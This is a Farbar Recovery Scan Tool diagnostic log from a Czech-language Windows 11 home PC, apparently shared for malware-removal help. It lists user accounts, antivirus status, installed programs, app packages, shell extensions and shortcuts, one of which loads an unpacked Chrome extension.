2022-08-04 21:38 - 2022-08-04 21:40 - 000000195 _____ () C:\Users\Woytman\AppData\Roaming\nuvotonISP.lua
2022-01-11 21:46 - 2022-11-07 19:20 - 000000128 _____ () C:\Users\Woytman\AppData\Roaming\winscp.rnd

==================== FLock ==============================

2022-11-05 02:36 C:\Users\Woytman\Application Data
2022-07-01 20:32 C:\Users\Woytman\AppData\Local\Application Data

==================== FCheck ================================

(If an entry is included in the fixlist, the file/folder will be moved.)

FCheck: C:\WINDOWS\SysWOW64\version_IObitDel.dll [2021-04-03] <==== ATTENTION (zero byte File/Folder)

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ========================

[autoprd]

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 06-11-2022
Ran by Woytman (07-11-2022 22:45:06)
Running from C:\Users\Woytman\Desktop
Microsoft Windows 11 Home Version 21H2 22000.1098 (X64) (2021-10-23 22:06:37)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================


(If an entry is included in the fixlist, it will be removed.)

Administrator (S-1-5-21-3110588475-2115266248-3539613761-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3110588475-2115266248-3539613761-503 - Limited - Disabled)
Guest (S-1-5-21-3110588475-2115266248-3539613761-501 - Limited - Disabled)
WDAGUtilityAccount (S-1-5-21-3110588475-2115266248-3539613761-504 - Limited - Disabled)
Woytman (S-1-5-21-3110588475-2115266248-3539613761-1001 - Administrator - Enabled) => C:\Users\Woytman

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

7-Zip 22.00 (x64) (HKLM\...\7-Zip) (Version: 22.00 - Igor Pavlov)
AdGuard (HKLM-x32\...\{685F6AB3-7C61-42D1-AE5B-3864E48D1035}) (Version: 7.9.3869.0 - Adguard Software Ltd)
AdGuard (HKLM-x32\...\{f6465dc4-c684-41fa-ab39-8d05c75904cd}) (Version: 7.8.3779.0 - Adguard Software Ltd)
Adobe Acrobat Reader DC - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AC0F074E4100}) (Version: 21.001.20138 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\{58975D61-1C4B-4385-ADB0-4A8E3EC250A4}) (Version: 33.1.1.743 - HARMAN International) Hidden
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 33.1.1.743 - HARMAN International)
Adobe Photoshop CC 2015 (HKLM-x32\...\{793C2BF7-A4FE-4608-91C9-9282C5801C21}) (Version: 16.0 - Adobe Systems Incorporated)
AntiMicroX (HKLM\...\AntiMicroX) (Version: 3.2.1 - Humanity)
Aplikace Intel® PROSet/Wireless (HKLM-x32\...\{cc6edfa9-9806-4a53-9313-f8e2d11d69c4}) (Version: 20.120.0 - Intel Corporation)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.14 - Michael Tippach)
Balíček ovladače systému Windows - Google, Inc. (WinUSB) AndroidUsbDeviceClass (08/28/2014 11.0.0000.00000) (HKLM\...\092555911492C6959D2596D612F52DCA71881CA2) (Version: 08/28/2014 11.0.0000.00000 - Google, Inc.)
Balíček ovladače systému Windows - Microsoft PS VR Control (Interface 5) (02/22/2013 6.1.7600.16385) (HKLM\...\7664041C62AE68D4B2EB4627167336BB2D4D7C46) (Version: 02/22/2013 6.1.7600.16385 - Microsoft)
Balíček ovladače systému Windows - PSVR V1 Monitor (07/26/2019 1.0.0000.2) (HKLM\...\70A8FA744F6781C50310DB1812580CDBB1E1C143) (Version: 07/26/2019 1.0.0000.2 - PSVR V1)
Balíček ovladače systému Windows - PSVR V2 Monitor (07/26/2019 1.0.0000.2) (HKLM\...\6548DFCB223CBDF91B9800993A6192BA9DC6222C) (Version: 07/26/2019 1.0.0000.2 - PSVR V2)
Balíček ovladače systému Windows - Ross-Tech HIDClass (01/05/2014 6.3.0.3) (HKLM\...\3A9B09BBD4F12A76FBBD3A428729660930BA5F13) (Version: 01/05/2014 6.3.0.3 - Ross-Tech)
Balíček ovladače systému Windows - Sony Monitor (01/01/2020 1.0.0.7) (HKLM\...\0D35615C8CCCCD642BD1C8558348D2B1BA24B67B) (Version: 01/01/2020 1.0.0.7 - Sony)
Balíček ovladače systému Windows - Sony Monitor (01/01/2020 1.0.0.7) (HKLM\...\32177D3FE2EEDA41511C41D6B21621C8E7131772) (Version: 01/01/2020 1.0.0.7 - Sony)
Balíček ovladače systému Windows - Sony Monitor (01/01/2020 1.0.0.7) (HKLM\...\A7330D958F3FA3C45688DF899FE2D5033F1F9FAA) (Version: 01/01/2020 1.0.0.7 - Sony)
Balíček ovladače systému Windows - Sony Monitor (01/01/2020 1.0.0.7) (HKLM\...\DBD2306B7DC331E1E3461932DDB4ECB2CB94C0A7) (Version: 01/01/2020 1.0.0.7 - Sony)
Balíček ovladače systému Windows - Sony Monitor (02/01/2019 1.0.0.5) (HKLM\...\688B5D24F096088E969299173087ACBEC571DB59) (Version: 02/01/2019 1.0.0.5 - Sony)
Battery Calibration (HKLM-x32\...\InstallShield_{634AC01E-49DB-4AD2-B87C-90D4DCC6AFA1}) (Version: 1.0.2001.2101 - Micro-Star International Co., Ltd.)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 6.05 - Piriform)
CPUID HWMonitor 1.46 (HKLM\...\CPUID HWMonitor_is1) (Version: 1.46 - CPUID, Inc.)
DeepL (HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\DeepL) (Version: 4.0.6052 - DeepL SE)
DeepL (HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\https%3a##appdownload.deepl.com#windows#0install#deepl.xml) (Version: - )
Dragon Center (HKLM-x32\...\InstallShield_{C65B26BC-5A6F-4135-9678-55A877655471}) (Version: 2.6.2005.0601 - Micro-Star International Co., Ltd.)
Epic Games Launcher (HKLM-x32\...\{20235E2B-1E9F-473D-A215-B2467F1F06E3}) (Version: 1.3.51.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{F9C5C994-F6B9-4D75-B3E7-AD01B84073E9}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Epic Online Services (HKLM-x32\...\{19695986-25CE-41AC-9C6F-54794653EDBA}) (Version: 2.0.36.0 - Epic Games, Inc.)
FFB Racing Wheel drivers (HKLM-x32\...\{28B758EA-5C83-48B1-B352-C70F12C73F5A}) (Version: 4.TTRS.2021 - Thrustmaster)
GOG GALAXY (HKLM-x32\...\{7258BA11-600C-430E-A759-27E2C691A335}_is1) (Version: - GOG.com)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 107.0.5304.88 - Google LLC)
Grand Theft Auto V (HKLM-x32\...\{5EFC6C07-6B87-43FC-9524-F9E967241741}) (Version: 1.0.2699.16 - Rockstar Games)
HxD Hex Editor 2.5 (HKLM\...\HxD_is1) (Version: 2.5 - Maël Hörz)
Cheat Engine 7.4 (HKLM\...\Cheat Engine_is1) (Version: - Cheat Engine)
Intel(R) Chipset Device Software (HKLM\...\{148D6ED8-24B8-443D-9C5B-5D6BF506671B}) (Version: 10.1.17903.8106 - Intel Corporation) Hidden
Intel® PROSet/Wireless WiFi Software (HKLM\...\{8F7809B3-BA0B-4190-8F42-A26155830655}) (Version: 20.120.0.2866 - Intel Corporation) Hidden
Java 8 Update 321 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180321F0}) (Version: 8.0.3210.7 - Oracle Corporation)
Java 8 Update 331 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180331F0}) (Version: 8.0.3310.9 - Oracle Corporation)
Java SE Development Kit 8 Update 321 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0180321}) (Version: 8.0.3210.7 - Oracle Corporation)
JDownloader 2 (HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Launcher Prerequisites (x64) (HKLM-x32\...\{43a03b9c-4770-409c-a999-587b60700b63}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
LEGO® Bricktales (HKLM-x32\...\1488738238_is1) (Version: 1.1_Master2 - GOG.com)
Lightshot-5.5.0.7 (HKLM-x32\...\{30A5B3C9-2084-4063-A32A-628A98DE512B}_is1) (Version: 5.5.0.7 - Skillbrains)
Mem Reduct (HKLM\...\memreduct) (Version: 3.4 - Henry++)
Microsoft .NET Host - 6.0.10 (x64) (HKLM\...\{0222FFF1-57A3-48A6-9AD2-0D6B5D0172B3}) (Version: 48.43.48869 - Microsoft Corporation) Hidden
Microsoft .NET Host FX Resolver - 6.0.10 (x64) (HKLM\...\{A93C4E12-1BAB-4CFB-ADBC-9CE0B93176FF}) (Version: 48.43.48869 - Microsoft Corporation) Hidden
Microsoft .NET Runtime - 6.0.10 (x64) (HKLM\...\{A2A39CB9-677D-4299-8537-C00B99F3D4A4}) (Version: 48.43.48869 - Microsoft Corporation) Hidden
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 107.0.1418.35 - Microsoft Corporation)
Microsoft Edge WebView2 Runtime (HKLM-x32\...\Microsoft EdgeWebView) (Version: 107.0.1418.35 - Microsoft Corporation)
Microsoft Excel 2019 - cs-cz (HKLM\...\Excel2019Retail - cs-cz) (Version: 16.0.15726.20174 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50918.0 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{6A2A8076-135F-4F55-BB02-DED67C8C6934}) (Version: 4.67.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (HKLM\...\{37B8F9C7-03FB-3253-8781-2517C99D7C00}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (HKLM\...\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 (HKLM-x32\...\{B175520C-86A2-35A7-8619-86DC379688B9}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 (HKLM-x32\...\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40664 (HKLM-x32\...\{042d26ef-3dbe-4c25-95d3-4c1b11b235a7}) (Version: 12.0.40664.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40664 (HKLM-x32\...\{9dff3540-fc85-4ed5-ac84-9e3c7fd8bece}) (Version: 12.0.40664.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40664 (HKLM\...\{010792BA-551A-3AC0-A7EF-0FAB4156C382}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40664 (HKLM\...\{53CF6934-A98D-3D84-9146-FC4EDF3D5641}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40664 (HKLM-x32\...\{D401961D-3A20-3AC7-943B-6139D5BD490A}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40664 (HKLM-x32\...\{8122DAB1-ED4D-3676-BB0A-CA368196543E}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.32.31332 (HKLM-x32\...\{3746f21b-c990-4045-bb33-1cf98cff7a68}) (Version: 14.32.31332.0 - Microsoft Corporation)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.32.31332 (HKLM-x32\...\{a98dc6ff-d360-4878-9f0a-915eba86eaf3}) (Version: 14.32.31332.0 - Microsoft Corporation)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.32.31332 (HKLM\...\{F4499EE3-A166-496C-81BB-51D1BCDC70A9}) (Version: 14.32.31332 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.32.31332 (HKLM\...\{3407B900-37F5-4CC2-B612-5CD5D580A163}) (Version: 14.32.31332 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.32.31332 (HKLM-x32\...\{8972AC25-452E-4FFE-945A-EB9E28C20322}) (Version: 14.32.31332 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.32.31332 (HKLM-x32\...\{AEAA18F7-9C96-4A43-BC07-8B88A4913EEB}) (Version: 14.32.31332 - Microsoft Corporation) Hidden
Microsoft Windows Desktop Runtime - 6.0.10 (x64) (HKLM\...\{3EC7701F-54F2-491D-AFD1-0395F465BC5A}) (Version: 48.43.48870 - Microsoft Corporation) Hidden
Microsoft Windows Desktop Runtime - 6.0.10 (x64) (HKLM-x32\...\{ff748137-9c9a-4056-be0a-48c7e465453c}) (Version: 6.0.10.31726 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
MSVCRT Redists (HKLM\...\{151C3FD1-4A0B-11EA-8579-00155D6302F2}) (Version: 1.0 - MAGIX Computer Products Intl. Co.) Hidden
MSVCRT Redists (HKLM\...\{84E336E1-F7A1-11EA-AFD6-00155D8D255C}) (Version: 1.0 - MAGIX Computer Products Intl. Co.) Hidden
NetLimiter 4 (HKLM\...\{543BB510-BFE4-4AF9-B6B5-A2A18C7A590E}) (Version: 4.1.14.0 - Locktime Software) Hidden
NetLimiter 4 (HKLM-x32\...\NetLimiter 4 4.1.14.0) (Version: 4.1.14.0 - Locktime Software)
Notepad++ (64-bit x64) (HKLM\...\Notepad++) (Version: 8.4.6 - Notepad++ Team)
NVIDIA FrameView SDK 1.3.8107.31782123 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_FrameViewSdk) (Version: 1.3.8107.31782123 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.26.0.154 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.26.0.154 - NVIDIA Corporation)
NVIDIA Ovladače grafiky 526.47 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 526.47 - NVIDIA Corporation)
NVIDIA Systémový software PhysX 9.21.0713 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.21.0713 - NVIDIA Corporation)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 28.0.3 - OBS Project)
Office 16 Click-to-Run Extensibility Component (HKLM\...\{90160000-008C-0000-1000-0000000FF1CE}) (Version: 16.0.15726.20096 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-007E-0000-1000-0000000FF1CE}) (Version: 16.0.15726.20096 - Microsoft Corporation) Hidden
OnTopReplica (HKLM-x32\...\{F149C020-D121-45B2-A630-5DB052413244}) (Version: 3.5.1 - OnTopReplica)
OpenAL (HKLM-x32\...\OpenAL) (Version: - )
ParkControl (HKLM-x32\...\ParkControl) (Version: 2.2.2.2 - Bitsum)
PC Building Simulator - Esports Expansion (HKLM-x32\...\1219750541_is1) (Version: v1.15.3 - GOG.com)
PC Building Simulator (HKLM-x32\...\2147483071_is1) (Version: v1.15.3 - GOG.com)
PowerToys (Preview) (HKLM\...\{6E97D19B-84B5-47DF-A03A-0EE9637A8498}) (Version: 0.60.1 - Microsoft Corporation) Hidden
PowerToys (Preview) x64 (HKLM-x32\...\{2b34ef9c-2147-46a9-8bf1-1a0edd1c5a51}) (Version: 0.60.1 - Microsoft Corporation)
qBittorrent 4.4.5 (HKLM-x32\...\qBittorrent) (Version: 4.4.5 - The qBittorrent project)
Razer Synapse (HKLM-x32\...\Razer Synapse) (Version: 3.7.1015.100615 - Razer Inc.)
Realtek Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.9084.1 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.36.701.2019 - Realtek)
Remove Empty Directories version 2.2 (HKLM-x32\...\{06F25DC8-71E2-44E2-805A-F15E15B51C74}_is1) (Version: 2.2 - Jonas John)
Revo Uninstaller Pro 5.0.6 (HKLM\...\{67579783-0FB7-4F7B-B881-E5BE47C9DBE0}_is1) (Version: 5.0.6 - VS Revo Group, Ltd.)
Roblox Player for Woytman (HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\roblox-player) (Version: - Roblox Corporation)
Rockstar Games Launcher (HKLM-x32\...\Rockstar Games Launcher) (Version: 1.0.66.1083 - Rockstar Games)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 2.1.5.1 - Rockstar Games)
Sophos Virus Removal Tool (HKLM-x32\...\{B829E117-D072-41EA-9606-9826A38D34C1}) (Version: 2.9.0 - Sophos Limited)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
The Wolf Among Us (HKLM-x32\...\The Wolf Among Us_is1) (Version: 0.0.0 - DODI-Repacks)
The Wolf Among Us čeština verze 5.1 (HKLM-x32\...\{47E808C7-0C07-4DF8-877F-7FD653DCDE7B}_is1) (Version: 5.1 - )
TLauncher (HKLM-x32\...\TLauncher) (Version: 2.83 - TLauncher Inc.)
TreeSize Free V4.5.3 (HKLM-x32\...\TreeSize Free_is1) (Version: 4.5.3 - JAM Software)
VEGAS Pro 18.0 (HKLM\...\{82C2EEEE-F7A1-11EA-B428-00155D8D255C}) (Version: 18.0.334 - VEGAS)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.16 - VideoLAN)
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.16 - VideoLAN)
Windows Subsystem for Linux Update (HKLM\...\{F8474A47-8B5D-4466-ACE3-78EAB3BF21A8}) (Version: 5.10.102.1 - Microsoft Corporation)
Windows Subsystem for Linux WSLg Preview (HKLM\...\{E04B0005-A349-4BCC-9662-CA0132007E14}) (Version: 1.0.26 - Microsoft Corporation)
WinRAR 6.11 (64-bit) (HKLM\...\WinRAR archiver) (Version: 6.11.0 - win.rar GmbH)
WinSCP 5.21.5 (HKLM-x32\...\winscp3_is1) (Version: 5.21.5 - Martin Prikryl)
Wise Force Deleter 1.5.3 (HKLM-x32\...\Wise Force Deleter_is1) (Version: 1.5.3 - WiseCleaner.com, Inc.)

Packages:
=========
DragonCenter -> C:\Program Files\WindowsApps\9426MICRO-STARINTERNATION.DragonCenter_2.0.100.0_x64__kzh8wxbdkxb8p [2022-09-15] (MICRO-STAR INTERNATIONAL CO., LTD) [Startup Task]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2022-09-30] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2022-09-30] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.14.9130.0_x64__8wekyb3d8bbwe [2022-10-23] (Microsoft Studios) [MS Ad]
Microsoft.PowerToys.ImageResizerContextMenu -> C:\Program Files\PowerToys\modules\ImageResizer [2022-09-15] (0)
MSI Driver & App Center -> C:\Program Files\WindowsApps\msiappadm.MSIDriverAppCenter_1.2009.1001.0_x64__7f61qv3vk9gn2 [2022-11-05] (msiappadm)
NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.963.0_x64__56jybvy8sckqj [2022-11-05] (NVIDIA Corp.)
Ovládací centrum grafiky Intel® -> C:\Program Files\WindowsApps\AppUp.IntelGraphicsExperience_1.100.3408.0_x64__8j3eq9eme6ctt [2022-10-23] (INTEL CORP) [Startup Task]
PowerRenameContextMenu -> C:\Program Files\PowerToys\modules\PowerRename [2022-09-15] (0)
Realtek Audio Control -> C:\Program Files\WindowsApps\RealtekSemiconductorCorp.RealtekAudioControl_1.37.275.0_x64__dt26b99r8h8gj [2022-09-15] (Realtek Semiconductor Corp)
WinRAR -> C:\Program Files\WinRAR [2022-04-05] (0)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{36B27788-A8BB-4698-A756-DF9F11F64F84}\InprocServer32 -> C:\Program Files\PowerToys\modules\FileExplorerPreview\PowerToys.SvgThumbnailProvider.comhost.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{45769bcc-e8fd-42d0-947e-02beef77a1f5}\InprocServer32 -> C:\Program Files\PowerToys\modules\FileExplorerPreview\PowerToys.MarkdownPreviewHandler.comhost.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2\InprocServer32 -> => No File
CustomCLSID: HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2}\InprocServer32 -> => No File
CustomCLSID: HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{8BC8AFC2-4E7C-4695-818E-8C1FFDCEA2AF}\InprocServer32 -> C:\Program Files\PowerToys\modules\FileExplorerPreview\PowerToys.StlThumbnailProvider.comhost.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{afbd5a44-2520-4ae0-9224-6cfce8fe4400}\InprocServer32 -> C:\Program Files\PowerToys\modules\FileExplorerPreview\PowerToys.MonacoPreviewHandler.comhost.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{b72e6f5e-f6e0-a9eb-461b-6118363bd15c}\localserver32 -> C:\Users\Woytman\AppData\Local\0install.net\implementations\sha256new_ME32KR4KFS62IPP6CZ6OLXWMK62LKHIR5M2Y3OPQE5VDTOKMLW6A\DeepL.exe (DeepL SE -> DeepL SE)
CustomCLSID: HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{BFEE99B4-B74D-4348-BCA5-E757029647FF}\InprocServer32 -> C:\Program Files\PowerToys\modules\FileExplorerPreview\PowerToys.GcodeThumbnailProvider.comhost.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{ddee2b8a-6807-48a6-bb20-2338174ff779}\InprocServer32 -> C:\Program Files\PowerToys\modules\FileExplorerPreview\PowerToys.SvgPreviewHandler.comhost.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{ec52dea8-7c9f-4130-a77b-1737d0418507}\InprocServer32 -> C:\Program Files\PowerToys\modules\FileExplorerPreview\PowerToys.GcodePreviewHandler.comhost.dll (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2022-06-15] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\PROGRAM FILES\NOTEPAD++\NppShell_06.dll [2022-09-03] (Notepad++ -> )
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2022-03-03] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2022-03-03] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers3: [PowerRenameExt] -> {0440049F-D1DC-4E46-B27B-98393D79486B} => C:\Program Files\PowerToys\modules\PowerRename\PowerToys.PowerRenameExt.dll [2022-07-13] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers4: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => -> No File
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2022-06-15] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [Offline Files] -> {474C98EE-CF3D-41f5-80E3-4AAB0AB04301} => -> No File
ContextMenuHandlers5: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => -> No File
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\System32\DriverStore\FileRepository\nvmii.inf_amd64_3c492dde906d8149\nvshext.dll [2022-10-26] (Nvidia Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2022-06-15] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [Offline Files] -> {474C98EE-CF3D-41f5-80E3-4AAB0AB04301} => -> No File
ContextMenuHandlers6: [RUShellExt] -> {2C5515DC-2A7E-4BFD-B813-CACC2B685EB7} => C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll [2022-04-04] (VS Revo Group Ltd. -> VS Revo Group)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2022-03-03] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2022-03-03] (win.rar GmbH -> Alexander Roshal)

==================== Codecs (Whitelisted) ====================

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)

ShortcutWithArgument: C:\Users\Woytman\Desktop\Google Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory="Default" --load-extension="C:\Users\Woytman\klkcjajbnhfgbomfdfpaojadidaapeni"
ShortcutWithArgument: C:\Users\Woytman\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome\PřekladyHer.lnk -> C:\Program Files\Google\Chrome\Application\chrome_proxy.exe (Google LLC) -> --profile-directory=Default --app-id=nehnnmpngmglmeflpkegpglfmkfplolf
